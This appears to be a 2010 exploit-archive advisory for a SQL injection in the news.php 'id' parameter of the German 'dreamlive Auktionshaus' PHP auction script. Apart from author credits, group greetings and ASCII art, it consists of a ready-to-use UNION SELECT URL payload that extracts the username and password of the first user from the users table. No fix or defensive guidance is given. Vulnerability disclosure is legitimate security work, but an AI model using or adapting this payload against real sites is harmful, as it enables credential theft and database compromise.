Dreamlive Auktionshaus Script suffers from a remote SQL injection vulnerability.
88cda526b7ab3359a9cb801175b64b3aae02da3feb4b9bf77b87d88dc73863ce
----------------------------Information------------------------------------------------
+Name : dreamlive Auktionshaus script news.php (id) SQL Injection
+Autor : Easy Laster
+Date : 12.03.2010
+Script : dreamlive Auktionshaus script
+Download : --------------------
+Demo : http://dreamlive.de
+Price : unknowing
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
---------------------------------------------------------------------------------------
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|
----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktionshaus/news.php?id=
+Exploitable : http://www.site.com/auktionshaus/news.php?id=999999+union+select+1,2,
concat(name,0x3a,password),4,5+from+users+where+id=1--
-----------------------------------------------------------------------------------------